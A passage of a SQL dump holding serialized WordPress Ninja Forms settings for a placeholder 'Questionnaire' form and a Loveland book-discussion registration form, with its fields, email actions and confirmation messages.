dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:14:\"drawerDisabled\";s:0:\"\";s:9:\"parent_id\";s:2:\"50\";s:11:\"field_label\";s:10:\"Question 1\";s:9:\"field_key\";s:24:\"question_1_1523910940120\";}s:2:\"id\";i:465;}i:7;a:2:{s:8:\"settings\";a:18:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";s:0:\"\";s:5:\"order\";s:1:\"8\";s:5:\"label\";s:10:\"Question 2\";s:4:\"type\";s:10:\"listselect\";s:3:\"key\";s:24:\"question_2_1523910945938\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";s:0:\"\";s:7:\"options\";a:3:{i:0;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:14:\"drawerDisabled\";s:0:\"\";s:9:\"parent_id\";s:2:\"50\";s:11:\"field_label\";s:10:\"Question 2\";s:9:\"field_key\";s:24:\"question_2_1523910945938\";}s:2:\"id\";i:466;}i:8;a:2:{s:8:\"settings\";a:18:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";s:0:\"\";s:5:\"order\";s:1:\"9\";s:5:\"label\";s:10:\"Question 3\";s:4:\"type\";s:9:\"listradio\";s:3:\"key\";s:24:\"question_3_1523910957654\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";s:0:\"\";s:7:\"options\";a:3:{i:0;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:14:\"drawerDisabled\";s:0:\"\";s:9:\"parent_id\";s:2:\"50\";s:11:\"field_label\";s:10:\"Question 3\";s:9:\"field_key\";s:24:\"question_3_1523910957654\";}s:2:\"id\";i:467;}i:9;a:2:{s:8:\"settings\";a:26:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";s:0:\"\";s:5:\"order\";s:2:\"10\";s:5:\"label\";s:10:\"Question 4\";s:4:\"type\";s:7:\"textbox\";s:3:\"key\";s:24:\"question_4_1523910969934\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";s:0:\"\";s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:10:\"characters\";s:15:\"input_limit_msg\";s:17:\"Character(s) left\";s:10:\"manual_key\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:4:\"mask\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:21:\"custom_name_attribute\";s:0:\"\";s:14:\"drawerDisabled\";s:0:\"\";s:9:\"parent_id\";s:2:\"50\";s:11:\"field_label\";s:10:\"Question 4\";s:9:\"field_key\";s:24:\"question_4_1523910969934\";}s:2:\"id\";i:468;}i:10;a:2:{s:8:\"settings\";a:26:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";s:0:\"\";s:5:\"order\";s:2:\"11\";s:5:\"label\";s:10:\"Question 5\";s:4:\"type\";s:8:\"textarea\";s:3:\"key\";s:24:\"question_5_1523910981688\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";s:0:\"\";s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:10:\"characters\";s:15:\"input_limit_msg\";s:17:\"Character(s) left\";s:10:\"manual_key\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:12:\"textarea_rte\";s:0:\"\";s:18:\"disable_rte_mobile\";s:0:\"\";s:14:\"textarea_media\";s:0:\"\";s:14:\"drawerDisabled\";s:0:\"\";s:9:\"parent_id\";s:2:\"50\";s:11:\"field_label\";s:10:\"Question 5\";s:9:\"field_key\";s:24:\"question_5_1523910981688\";}s:2:\"id\";i:469;}i:11;a:2:{s:8:\"settings\";a:13:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";s:0:\"\";s:5:\"order\";s:2:\"12\";s:4:\"type\";s:6:\"submit\";s:5:\"label\";s:6:\"Submit\";s:16:\"processing_label\";s:10:\"Processing\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:20:\"submit_1523910734890\";s:9:\"parent_id\";s:2:\"50\";s:11:\"field_label\";s:6:\"Submit\";s:9:\"field_key\";s:20:\"submit_1523910734890\";}s:2:\"id\";i:470;}}s:7:\"actions\";a:3:{i:0;a:2:{s:8:\"settings\";a:25:{s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:4:\"save\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-04-16 20:32:15\";s:5:\"label\";s:16:\"Store Submission\";s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";s:0:\"\";s:5:\"order\";s:1:\"3\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:8:\"reply_to\";s:0:\"\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:19:\"email_message_plain\";s:0:\"\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:9:\"parent_id\";s:2:\"50\";}s:2:\"id\";i:199;}i:1;a:2:{s:8:\"settings\";a:27:{s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:14:\"successmessage\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-04-16 20:32:15\";s:5:\"label\";s:15:\"Success Message\";s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";s:0:\"\";s:7:\"message\";s:42:\"Your form has been successfully submitted.\";s:5:\"order\";s:1:\"1\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:8:\"reply_to\";s:0:\"\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:19:\"email_message_plain\";s:0:\"\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:42:\"Your form has been successfully submitted.\";s:9:\"parent_id\";s:2:\"50\";}s:2:\"id\";i:200;}i:2;a:2:{s:8:\"settings\";a:24:{s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-04-16 20:32:15\";s:5:\"label\";s:11:\"Admin Email\";s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";s:0:\"\";s:5:\"order\";s:1:\"2\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:8:\"reply_to\";s:0:\"\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:19:\"email_message_plain\";s:0:\"\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:9:\"parent_id\";s:2:\"50\";}s:2:\"id\";i:201;}}s:8:\"settings\";a:22:{s:5:\"title\";s:13:\"Questionnaire\";s:10:\"created_at\";s:19:\"2021-07-08 07:47:20\";s:10:\"form_title\";s:13:\"Questionnaire\";s:17:\"default_label_pos\";s:5:\"above\";s:10:\"show_title\";s:1:\"0\";s:14:\"clear_complete\";s:1:\"1\";s:13:\"hide_complete\";s:1:\"1\";s:9:\"logged_in\";s:1:\"0\";s:7:\"seq_num\";N;s:10:\"objectType\";s:12:\"Form Setting\";s:10:\"editActive\";s:1:\"1\";s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:0:\"\";s:10:\"add_submit\";s:1:\"1\";s:8:\"currency\";s:0:\"\";s:18:\"unique_field_error\";s:50:\"A form with this value has already been submitted.\";s:17:\"not_logged_in_msg\";s:0:\"\";s:13:\"sub_limit_msg\";s:42:\"The form has reached its submission limit.\";s:12:\"calculations\";a:0:{}s:15:\"formContentData\";a:12:{i:0;s:23:\"firstname_1523910710496\";i:1;s:22:\"lastname_1523910710972\";i:2;s:19:\"email_1523910925640\";i:3;s:32:\"email_confirmation_1523911122242\";i:4;s:35:\"gender_identification_1523910801816\";i:5;s:17:\"age_1523910843594\";i:6;s:24:\"question_1_1523910940120\";i:7;s:24:\"question_2_1523910945938\";i:8;s:24:\"question_3_1523910957654\";i:9;s:24:\"question_4_1523910969934\";i:10;s:24:\"question_5_1523910981688\";i:11;s:20:\"submit_1523910734890\";}s:14:\"drawerDisabled\";s:0:\"\";}}',4,0x00),(51,'a:7:{s:2:\"id\";i:51;s:20:\"show_publish_options\";b:0;s:6:\"fields\";a:7:{i:0;a:2:{s:8:\"settings\";a:15:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"1\";s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:74:\"Loveland - Book Discussion Registration -Autobiography of a Modern Prophet\";s:3:\"key\";s:88:\"loveland_-_book_discussion_registration_-autobiography_of_a_modern_prophet_1630271086284\";s:4:\"type\";s:4:\"html\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:7:\"default\";s:347:\"<p style=\"font-size: 23px; margin-bottom: -10px !important; color:#23507D;font-weight:strong;\">Loveland - Book Discussion Registration -Autobiography of a Modern Prophet</p><p style=\"font-size: 16px; margin-bottom: -10px !important; color:#333333;font-weight:strong;\">After registration, you will receive event login information via email.<br></p>\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"field_label\";s:63:\"Book Discussion Registration -Autobiography of a Modern Prophet\";s:9:\"field_key\";s:77:\"book_discussion_registration_-autobiography_of_a_modern_prophet_1621437234063\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:471;}i:1;a:2:{s:8:\"settings\";a:13:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"2\";s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:7:\"Divider\";s:3:\"key\";s:2:\"hr\";s:4:\"type\";s:2:\"hr\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"field_label\";s:7:\"Divider\";s:9:\"field_key\";s:2:\"hr\";}s:2:\"id\";i:473;}i:2;a:2:{s:8:\"settings\";a:24:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"3\";s:11:\"idAttribute\";s:2:\"id\";s:14:\"drawerDisabled\";s:0:\"\";s:5:\"label\";s:10:\"First Name\";s:3:\"key\";s:9:\"firstname\";s:4:\"type\";s:9:\"firstname\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";s:1:\"1\";s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:11:\"field_label\";s:10:\"First Name\";s:9:\"field_key\";s:9:\"firstname\";s:21:\"custom_name_attribute\";s:5:\"fname\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:474;}i:3;a:2:{s:8:\"settings\";a:24:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"4\";s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:9:\"Last Name\";s:3:\"key\";s:8:\"lastname\";s:4:\"type\";s:8:\"lastname\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";s:1:\"1\";s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:11:\"field_label\";s:9:\"Last Name\";s:9:\"field_key\";s:8:\"lastname\";s:21:\"custom_name_attribute\";s:5:\"lname\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:475;}i:4;a:2:{s:8:\"settings\";a:23:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"5\";s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:5:\"Email\";s:3:\"key\";s:5:\"email\";s:4:\"type\";s:5:\"email\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";s:1:\"1\";s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:14:\"one-half first\";s:13:\"element_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:11:\"field_label\";s:5:\"Email\";s:9:\"field_key\";s:5:\"email\";s:21:\"custom_name_attribute\";s:5:\"email\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:476;}i:5;a:2:{s:8:\"settings\";a:14:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"8\";s:11:\"idAttribute\";s:2:\"id\";s:3:\"key\";s:159:\"your_email_address_and_other_information_will_not_be_shared_with_any_third_parties_for_any_reason_it_will_only_be_used_to_respond_to_your_request_1617158441662\";s:13:\"element_class\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:5:\"label\";s:0:\"\";s:4:\"type\";s:4:\"html\";s:7:\"default\";s:158:\"<p>Your email address and other information will not be shared with any third parties for any reason. It will only be used to respond to your request.<br></p>\";s:14:\"drawerDisabled\";s:0:\"\";s:11:\"field_label\";s:0:\"\";s:9:\"field_key\";s:159:\"your_email_address_and_other_information_will_not_be_shared_with_any_third_parties_for_any_reason_it_will_only_be_used_to_respond_to_your_request_1617158441662\";}s:2:\"id\";i:472;}i:6;a:2:{s:8:\"settings\";a:15:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"9\";s:11:\"idAttribute\";s:2:\"id\";s:14:\"drawerDisabled\";s:0:\"\";s:5:\"label\";s:6:\"Submit\";s:3:\"key\";s:20:\"submit_1618628929218\";s:4:\"type\";s:6:\"submit\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:16:\"processing_label\";s:10:\"Processing\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"field_label\";s:6:\"Submit\";s:9:\"field_key\";s:20:\"submit_1618628929218\";}s:2:\"id\";i:477;}}s:7:\"actions\";a:4:{i:0;a:2:{s:8:\"settings\";a:32:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:14:\"successmessage\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2021-08-29 12:58:19\";s:5:\"label\";s:15:\"Success Message\";s:7:\"message\";s:42:\"Your form has been successfully submitted.\";s:5:\"order\";s:1:\"1\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:8:\"reply_to\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:234:\"<p style=\" font-size:20pt;color:#1d5791;\" align=\"center\"><b>Thank you for registering for this book discussion!</b></p>\n<p style=\" font-size:16pt;color:#333333\" align=\"center\">You will receive an email with Zoom Login information.</p>\";s:19:\"email_message_plain\";s:0:\"\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:205;}i:1;a:2:{s:8:\"settings\";a:26:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2021-08-29 12:58:19\";s:5:\"label\";s:47:\"ECK Book Discussion - Registration Confirmation\";s:13:\"email_subject\";s:39:\"Thank you for registering for our 